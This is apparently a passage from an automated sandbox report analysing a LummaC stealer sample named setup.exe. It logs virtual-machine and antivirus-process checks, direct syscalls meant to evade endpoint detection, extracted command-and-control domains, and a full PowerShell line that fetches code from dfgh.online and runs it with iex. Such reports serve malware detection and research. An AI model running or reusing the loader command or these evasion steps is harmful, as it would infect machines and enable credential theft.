          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900295071.000000000091A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2085467955.000000000091A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWEFn
          Source: setup.exe, 00000000.00000002.2078744236.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drBinary or memory string: puQEMus
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000002.2117698700.000000000146C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000002.2117698700.000000000143C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~^g
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VallSecurityFMSFT_NetEventVmNetworkAdatper.format.ps1xml
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fule.cmdletDeMSFT_NetEventVmNetworkAdatper.cdxml
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B03B0 mov edx, dword ptr fs:[00000030h]0_2_007B03B0
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0970 mov eax, dword ptr fs:[00000030h]0_2_007B0970
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0D20 mov eax, dword ptr fs:[00000030h]0_2_007B0D20
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0FC0 mov eax, dword ptr fs:[00000030h]0_2_007B0FC0
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007B0FBF mov eax, dword ptr fs:[00000030h]0_2_007B0FBF
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
          LummaC encrypted strings found
          Source: setup.exeString found in binary or memory: rebuildeso.buzz
          Source: setup.exeString found in binary or memory: prisonyfork.buzz
          Source: setup.exeString found in binary or memory: learningypr.click
          Source: setup.exeString found in binary or memory: hummskitnj.buzz
          Source: setup.exeString found in binary or memory: cashfuzysao.buzz
          Source: setup.exeString found in binary or memory: appliacnesot.buzz
          Source: setup.exeString found in binary or memory: screwamusresz.buzz
          Source: setup.exeString found in binary or memory: inherineau.buzz
          Source: setup.exeString found in binary or memory: scentniej.buzz
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ?
          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ?Jump to behavior
          Source: setup.exeBinary or memory string: ProgMan
          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: setup.exeBinary or memory string: ProgManU
          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
          Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
